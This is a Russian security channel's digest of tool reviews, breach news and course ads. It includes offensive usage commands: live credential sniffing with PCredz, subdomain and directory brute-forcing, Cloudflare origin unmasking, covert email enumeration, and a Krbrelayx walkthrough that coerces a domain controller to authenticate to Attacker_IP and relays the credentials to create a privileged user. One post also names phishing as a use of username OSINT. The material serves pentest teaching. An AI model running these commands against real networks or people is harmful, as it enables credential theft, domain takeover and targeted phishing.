Codeby

💅 Tracecat — инструмент AI‑автоматизации для SecOps

Tracecat — открытая платформа автоматизации с ИИ для security и IT-команд: позволяет собирать workflows, оркестрировать алерты, вести кейсы и работать с таблицами в одном месте. Данный инструмент можно использовать как лёгкую, расширяемую альтернативу коммерческим SOAR/automation‑решениям.

Основные возможности Tracecat 🛠 Workflows и оркестрация ➡️ No-code UI для визуальной сборки цепочек действий (API-запросы, webhooks, трансформации, AI‑шаги). ➡️ Ветвление, условия, циклы и выражения для работы с данными между шагами. 🔍 AI‑помощь в расследованиях ➡️ Обогащение и суммаризация алертов с помощью LLM, авто‑описания инцидентов. ➡️ Поиск похожих кейсов и рекомендация шагов расследования. 🗓️ Кейсы и таблицы ➡️ Встроенный case management: создание кейсов из workflows, статусы, таймлайн и артефакты. ➡️ Lookup‑таблицы и пользовательские таблицы для списков IP, пользователей и других справочных данных. ⬇️ Установка и запуск 1️⃣ Локально (Docker Compose) - Клонировать репозиторий и развернуть стек через docker-compose по инструкции из официальной документации. - После запуска UI доступен локально, где создаётся первый пользователь и рабочее пространство. 2️⃣ Прод на AWS Fargate - Использовать Terraform‑модуль для развёртывания прод‑стека на AWS Fargate. - Подходит для команд, которым нужны масштабируемость и интеграция с облачной инфраструктурой. #tools #ai #soar #automatization ➡ Все наши каналы 💬Все наши чаты ⚡ Для связи с менеджером

WhatsApp* не собирается сдаваться💪 В WhatsApp* отреагировали на ограничения в работе мессенджера в России. Компания считает, что власти РФ хотят лишить людей возможности свободно общаться. Также компания заявила, что мессенджер МАХ, небезопасен - там могут украсть личные данные. 22 декабря, российские пользователи пожаловались на ограничения в работе WhatsApp* — более 3000 жалоб. 23 числа WhatsApp* опубликовала официальное заявление. В нем компания обвинила российские власти в нарушении прав 100 млн пользователей. "Ограничивая доступ к WhatsApp*, российское правительство стремится лишить более 100 млн человек права на конфиденциальное общение с использованием сквозного шифрования прямо перед новогодними праздниками" — заявили в WhatsApp*. В начале декабря 2025 года Роскомнадзор начал постепенно ограничивать работу WhatsApp* в России. Тогда в ведомстве объяснили, что площадка используется мошенниками, а сам мессенджер этого не пресекает. "Мы намерены бороться за наших пользователей, потому что принуждение людей к использованию менее безопасных приложений, одобренных государством, может привести лишь к снижению уровня безопасности для россиян" - заявили в WhatsApp*. Источник: https://www.gazeta.ru/tech/news/2025/12/23/27482941.shtml * *Компания Meta, а также её продукты (WhatsApp) признаны экстремистскими в России #news #WhatsApp #Russia ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

PCredz — автоматический анализатор трафика для извлечение учетных данных

PCredz — лёгкая, но мощная утилита для извлечения учетных данных, хэшей и другой чувствительной информации из pcap-файлов или живого сетевого трафика. Инструмент активно используют пентестеры, DFIR-аналитики и исследователи сетевой безопасности благодаря удобству, скорости и широкой поддержке протоколов.

⚡️ Основные возможности PCredz ➡️ Многопротокольный анализ Извлечение данных из IPv4 и IPv6 пакетов сразу по множеству протоколов: • NTLMv1/v2 (SMB, HTTP, LDAP, MSSQL и др.) • Kerberos AS-REQ Pre-Auth (etype 23) • HTTP Basic и формы авторизации • FTP, POP, SMTP, IMAP • SNMP community strings ➡️ Поиск кредитных карт в трафике Определяет и извлекает номера банковских карт, встречающиеся в сетевом потоке. ➡️ Хэши в формате для hashcat NTLMv1/v2 и Kerberos сохраняются в файлы, которые можно сразу отправлять в hashcat (режимы 5500, 5600, 7500). ➡️ Удобное логирование Все найденные данные сохраняются в CredentialDump-Session.log и в отдельные файлы (MSKerb.txt, NTLMv1.txt, NTLMv2.txt) в каталоге logs/. ⬇️ Установка и запуск 👩‍💻 Docker

git clone https://github.com/lgandx/PCredz
cd PCredz
docker build . -t pcredz
docker run --net=host -v $(pwd):/opt/Pcredz -it pcredz

👩‍💻 Linux

apt install python3-pip libpcap-dev file
pip3 install Cython python-libpcap

👩‍💻 Использование ⏺️ Разбор pcap-файла

python3 ./Pcredz -f capture.pcap

⏺️ Разбор всех pcap в каталоге

 python3 ./Pcredz -d /tmp/pcaps/ 

⏺️ Живой захват трафика

 python3 ./Pcredz -i eth0 -v 

👩‍💻 Аргументы запуска -f <file> Парсинг pcap-файла -d <dir> Рекурсивный разбор каталога -i <interface> Живой перехват трафика -v Подробный вывод -o <dir> Директория для логов ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером #PCredz #Kerberos #Pentest

Очень маленькая и полезная шпаргалка по контролю прав и разрешений в Linux. ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером #Linux #Шпаргалка #ПраваLinux

Многие думают, что безопасность приложений — задача программистов. Но на самом деле первую линию обороны создают пентестеры — «белые хакеры», которые целенаправленно ищут слабые места, пока это не сделали злоумышленники. Разбираем: 🟧Кто такой пентестер и почему без него не обойтись 🟧Что реально нужно знать и уметь: от сетей и Linux до Python и веб-технологий 🟧С чего начать путь: чек-лист от основ до первых сертификатов 🟧Где бесплатно практиковаться и что положить в портфолио В статье — готовый маршрут от изучения базовых команд до собеседования на первую позицию. 🟧На форуме вы найдете еще больше актуальной и полезной информации для начинающих и опытных специалистов. Изучайте темы от WAPT и уязвимостей вроде Log4Shell до тестирования AI, атак на умные города и промышленные системы. 🟧Делитесь в комментариях: что кажется вам самым сложным на пути в пентест? Расскажите о своем опыте, первых трудностях или задавайте вопросы🟧 ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером #снуля #обучение #новичкам #пентест #hackerlab #форум

GhostEyes GhostEyes — это асинхронный, модульный набор инструментов для наступательной разведки, предназначенный для сетевой и веб-разведки, а также для создания отчетов, предназначенный для специалистов по тестированию на проникновение, красных команд и исследователей. 📕Характеристика: Сетевая разведка: Сканирование подсети ARP, Обнаружение и выборка VLAN, DHCP-снупинг Веб-разведка: Брутфорс поддоменов, Брутфорс директорий Отчеты: Генерация TXT/JSON/HTML/CSV на основе предыдущих сканирований 💻Установка:

git clone https://github.com/6lackRaven/GhostEyes.git

cd GhostEyes

📌Использование: Сканирование ARP:

python ghosteyes.py net -i <INTERFACE> --scan <IP> --output <JSON-FILE>

Поиск VLAN:

python ghosteyes.py net -i <INTERFACE> --vlan --duration 120

Сканирование поддоменов:

python ghosteyes.py web -u <DOMAIN> -s <WORDLIST> -T

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером #GhostEyes #Разведка #Кибербезопасность #RedTeam

🫡 Spotify «взяли на абордаж». Пираты слили в сеть 86 млн треков Популярный музыкальный сервис Spotify столкнулся с одним из крупнейших пиратских взломов в истории стриминга — хакеры получили доступ почти ко всей библиотеке платформы и выложили в открытый доступ 86 млн аудиотреков общим объёмом более 300 ТБ. За инцидент взяла ответственность группировка Anna’s Archive, называющая себя «Робин Гудами цифровой эпохи» и заявляющая миссию «сохранения культурного наследия человечества». Они опубликовали ссылки на скачивание всей выгрузки. По словам взломщиков: 🔼 слиты только самые популярные треки 🔼 на эти 86 млн композиций приходится 99,6% всех прослушиваний Spotify 🔼 оригинальный каталог сервиса — около 256 млн треков Файлы распространяются через торрент‑раздачи в формате OGG Vorbis 160 Кбит/с. Хакеры подчёркивают, что выбрали «среднее качество» намеренно — чтобы «сохранить музыкальное наследие» в компактном виде. Все треки содержат оригинальные метаданные. ✅ Spotify подтвердил факт взлома и начало расследования. ✅ Однако архив уже доступен в сети, и удалить его теперь невозможно. Этот инцидент — тревожный сигнал для всей индустрии: даже крупнейшие стриминговые платформы с мощной DRM‑защитой оказываются уязвимы, когда мотивированные группы находят способ обойти барьеры. ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером #Spotify #Взлом #УтечкаДанных #Кибербезопасность #Кибератака

🎄В преддверии Нового года мы подготовили для вас подборку идей подарков для тех, кто увлекается информационной безопасностью. 🎁Среди идей — и наш подарочный сертификат. Это возможность подарить полезные знания и навыки в сфере ИБ. Подробнее об оформлении и формате сертификата. А какой из них порадовал бы именно вас? Делитесь своими мыслями в комментариях! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером

Как найти слабые места в веб-приложении до того, как их найдут хакеры? Расскажем на курсе WAPT от Академии Кодебай! 🛡 Это на 100% практический курс по пентесту, где вы попробуете изученные техники взлома в 65-ти заданиях нашей лаборатории! 🔴 Каждую неделю — вебинары с куратором! Старт 22 января. Регистрация здесь. Содержание курса: ✦ эксплуатация всех актуальных типов уязвимостей, активный / пассивный фаззинг ✦ SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection ✦ техники повышения привилегий, Client-side атаки (XSS, CSRF) Получите практические навыки как в рабочих задачах, так и в Bug Bounty. 🚀 По всем вопросам пишите @Codeby_Academy

SSLyze: Автоматизированный аудит SSL/TLS конфигураций серверов

SSLyze — это быстрый и мощный инструмент для сканирования SSL/TLS, написанный на Python. Он предназначен для автоматизированного анализа конфигураций серверов с целью проверки использования надежных криптографических настроек (сертификатов, наборов шифров) и выявления уязвимостей к известным атакам.

🔤Возможности🔤 - Инструмент оптимизирован для надежного сканирования сотен тысяч серверов ежедневно - Позволяет встраивать проверки безопасности в процессы непрерывной интеграции и доставки - Поддерживает сканирование не только HTTP/HTTPS серверов, но и сервисов, использующих SMTP, XMPP, LDAP, POP, IMAP, RDP, Postgres, FTP - Результаты могут быть сохранены в структурированном JSON-формате для последующего анализа - Автоматическая проверка конфигурации сервера на соответствие рекомендуемым профилям безопасности (например, от Mozilla) ⏩Установка

sudo apt install sslyze

Проверка
sslyze -h


⏩Базовое сканирование одного хоста
python -m sslyze example.com


⏩Сканирование нескольких целей за один запуск
python -m sslyze example.com google.com:443 192.168.1.10:8443


⏩Сканирование списка целей из файла
Предварительно создайте файл targets.txt, где каждая новая строка содержит адрес хоста (с портом или без):
example.com
api.example.com:443
192.168.1.100:8443

Запустите сканирование
python -m sslyze --targets_in targets.txt


⏩Проверка на соответствие стандарту Mozilla Intermediate
python -m sslyze --mozilla_config=intermediate example.com

Инструмент выведет результат («OK - Supported» или «FAILED - Not supported») и вернет соответствующий код выхода (0 при успехе, не 0 при наличии проблем), что удобно для CI/CD

⏩Расширенная проверка с фокусировкой на конкретные уязвимости
python -m sslyze --heartbleed --robot --certinfo example.com


⏩Сохранение полного отчета о сканировании в JSON-файл
python -m sslyze --json_out=scan_results.json example.com

🔤Важные примечания🔤 - При использовании ключа --targets_in в файле должна быть указана одна цель (hostname или hostname:port) на строку. В командной строке цели перечисляются через пробел - При использовании ключа --mozilla_config инструмент возвращает код 0, если сервер соответствует выбранному профилю, и код, отличный от 0, если соответствие не достигнуто. Это позволяет легко интегрировать проверку в скрипты автоматизации - Для проблемных или медленных соединений можно использовать опцию --slow_connection, чтобы уменьшить количество параллельных запросов ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

🎄 Сегодня стартовал новогодний CTF от HackerLab × «Хакер»! С 21 декабря в нашем боте каждый день будет появляться новая задача дня. 🧩 Решай задания → 🗝 собирай ключи → 🎁 участвуй в розыгрыше призов. 🕛 Первое задание уже доступно в боте! ➡️ Заходи в бота и решай задачи: @HLxXakepBot

Очень полезная шпаргалка по GIT, которая поможет вам чувствоваться себя уверенее в окружении. ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

🚩 Новые задания на платформе HackerLab! ⚙️ Категория Реверс-инжиниринг — Вишнёвая семёрка 🧰 Категория PWN — Говори — и будет исполнено —————————————— 🗂 В архив добавлены задания Киберколизея IV Приятного хакинга!

WhatsMyName: как найти цифровой след человека за пару кликов 🔍 WhatsMyName — это OSINT-инструмент, который позволяет быстро проверить, на каких онлайн-платформах используется конкретное имя пользователя. Без взлома. Без магии. Только открытые данные — и плохие привычки пользователей. ❓ Что делает WhatsMyName Инструмент проверяет сотни сайтов: соцсети, форумы, хостинги кода, сервисы для разработчиков, маркетплейсы и нишевые площадки. Ты вводишь ник — сервис проверяет, зарегистрирован ли он на известных платформах. Результат — список ресурсов, где этот username уже занят или существует. И этого более чем достаточно, чтобы начать раскрутку личности. Через WhatsMyName можно: ➡️ связать аккаунты человека на разных платформах ➡️ найти старые или забытые профили ➡️ определить интересы, профессию, хобби ➡️ подготовить фишинговую атаку или социальную инженерию ➡️ собрать профиль цели для дальнейшего OSINT Для пентестера — инструмент. Для журналиста — источник. Для сталкера — оружие. Для обычного пользователя — повод задуматься. 🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

CloakQuest3r CloakQuest3r — это мощный инструмент на Python, тщательно разработанный для раскрытия истинного IP-адреса веб-сайтов, защищённых Cloudflare и другими альтернативными сервисами, широко распространённым сервисом веб-безопасности и повышения производительности. Его основная задача — точно определить фактический IP-адрес веб-серверов, скрытых за защитой Cloudflare. Сканирование поддоменов является ключевым методом решения этой задачи. Этот инструмент — бесценный ресурс для тестировщиков на проникновение, специалистов по безопасности и веб-администраторов, стремящихся провести комплексную оценку безопасности и выявить уязвимости, которые могут быть скрыты мерами безопасности Cloudflare. 📕Характеристика: ➖Обнаружение реального IP-адреса: CloakQuest3r превосходно определяет реальные IP-адреса веб-серверов, использующих сервисы Cloudflare. ➖Сканирование поддоменов: Сканирование поддоменов является основополагающим компонентом процесса определения реального IP-адреса. Оно помогает определить фактический сервер, ответственный за размещение веб-сайта и связанных с ним поддоменов. ➖История IP-адресов: Извлекает историческую информацию об IP-адресах для заданного домена. ➖Анализ SSL-сертификата: Извлекает и анализирует SSL-сертификаты, связанные с целевым доменом. Поточное сканирование: Для повышения эффективности и ускорения процесса определения реального IP-адреса CloakQuest3r использует многопоточность. 💻Установка:

git clone https://github.com/spyboy-productions/CloakQuest3r.git

cd CloakQuest3r

📌Запуск:

python cloakquest3r.py example.com

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

🟠Цифровая интимность на витрине. Компрометация PornHub ⚫️ Хакерская группировка ShinyHunters заявила о компрометации данных ≈200 миллионов пользователей Pornhub, сообщает Reuters. Злоумышленники требуют выкуп в биткоинах, угрожая публикацией информации в открытом доступе.

ShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.

Какие данные скомпрометированы По подтверждённой информации, в утечке присутствуют: 🟠 email-адреса пользователей 🟠 история просмотров 🟠 поисковые запросы 🟠 ссылки и названия видео 🟠 метаданные пользовательской активности Это не просто PII, а поведенческие данные, позволяющие точно восстановить цифровой профиль пользователя. 🔸Эксперты считают, что взлом мог произойти не через инфраструктуру Pornhub напрямую, а через сторонний аналитический сервис Mixpanel, с которым платформа сотрудничала до 2021 года. 🔸Pornhub сообщил о расследовании и рекомендовал пользователям сохранять бдительность. Но в реальности этот инцидент — ещё одно напоминание: если данные куда-то отправляются — значит, однажды они могут утечь 🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Mailcat Mailcat - Найдите существующие адреса электронной почты по нику, используя методы проверки API/SMTP без уведомления пользователя. 📕Характеристики: ➖Удобный интерфейс ➖Поддержка tor ➖Поддержка proxy 💻Установка:

git clone https://github.com/sharsil/mailcat.git

cd mailcat

pip3 install -r requirements.txt --break-system-packages

📌Запуск:

python3 mailcat.py <NICKNAME>

➖Запуск с tor:

python3 mailcat.py --tor <NICKNAME>

➖Запуск с proxy:

proxychains4 -q python3 mailcat.py <NICKNAME> 

или

python3 mailcat.py <NICKNAME> --proxy http://127.0.0.1:8080

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

SSLScan: Инструмент для аудита SSL/TLS конфигураций

SSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.

💛Возможности - Анализ всех поддерживаемых сервером шифров для различных версий протоколов (SSLv2, SSLv3, TLS 1.0-1.3) - Четкое выявление, какие версии SSL и TLS (включая TLS 1.3) активированы на сервере - Тестирование порядка предпочтения шифров со стороны сервера - Получение детальной информации о цепочке сертификатов, включая алгоритмы подписи, срок действия, соответствие имени хоста (SNI) и использование расширений, таких как OCSP Must-Staple - Проверка на наличие известных уязвимостей, включая Heartbleed (CVE-2014-0160), ROBOT, поддержку сжатия TLS (CRIME) и поддержку безопасного возобновления сессии (Secure Renegotiation) - Возможность сканирования виртуальных хостов, использующих SNI - Вывод в удобочитаемом виде или в формате XML/JSON для последующего анализа в автоматизированных системах 💛Установка

sudo apt install sslscan

Проверка

sslscan -h

💛Базовое сканирование хоста

sslscan example.com

Эта команда выполнит все основные проверки для домена example.com на стандартном порту 443 💛Сканирование с указанием порта

sslscan example.com:8443

Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах 💛Проверка конкретной версии протокола (например, только TLS 1.2 и TLS 1.3)

sslscan --tls13 --tls12 example.com

💛Тестирование всех поддерживаемых шифров без проверки сертификата

sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.com

Опция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра 💛Сохранение отчета в формате XML

sslscan --xml=report.xml example.com

💛Недостатки ⁃ Однопоточная архитектура делает полное сканирование всех шифров крайне медленным - Для полной функциональности требуется статическая сборка с отдельной версией OpenSSL, что увеличивает размер файла и усложняет поддержку - Базовые форматы отчетов (XML/JSON) требуют дополнительной обработки; отсутствует API для автоматизации 🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

🔔 Python стал универсальным инструментом, который снимает рутину с пентестера и ускоряет работу.

Посмотрим, как это происходит на практике. ⬆️

Готовы использовать Python, чтобы ваш пентест стал быстрее и глубже? Сделайте себе профессиональный подарок. Запись на курс «Python для Пентестера» открыта до 25 декабря. 🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! По всем вопросам пишите ⚡️ @Codeby_Academy ➡️ Все наши каналы 💬Все наши чаты

Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory

Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.

🟧Набор Krbrelayx состоит из нескольких инструментов, каждый из которых нацелен на конкретные векторы атаки в инфраструктуре Active Directory: - Основная функция набора — проведение атак, связанных с ретрансляцией запросов Kerberos, для несанкционированного доступа к сетевым ресурсам - Инструменты позволяют создавать поддельные службы для перехвата и использования Kerberos-билетов, таких как TGS (Ticket Granting Service) - Набор демонстрирует эксплуатацию особенностей протокола Kerberos, включая проблемы с проверкой подлинности и делегированием - Поддержка различных методов указания целей, включая использование файлов и прямых аргументов командной строки 🟧Установка

sudo apt install krbrelayx

Проверяем

krbrelayx -h

🟧Переходим в директорию проекта и устанавливаем зависимости

cd krbrelayx
pip install -r requirements.txt

🟧Атака с использованием утилиты printerbug и ретрансляции 1. Запуск инструмента ретрансляции на машине атакующего

krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)

2. На другой консоли выполняется скрипт printerbug, который принуждает контроллер домена (dc01)

printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$

В результате хэш пароля учетной записи компьютера dc01$ может быть ретранслирован на сервер dc02, что потенциально позволит создать нового пользователя в домене с высокими привилегиями. 🟧Базовая команда для запуска слушателя и ретрансляции на указанный контроллер домена

krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря! ➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером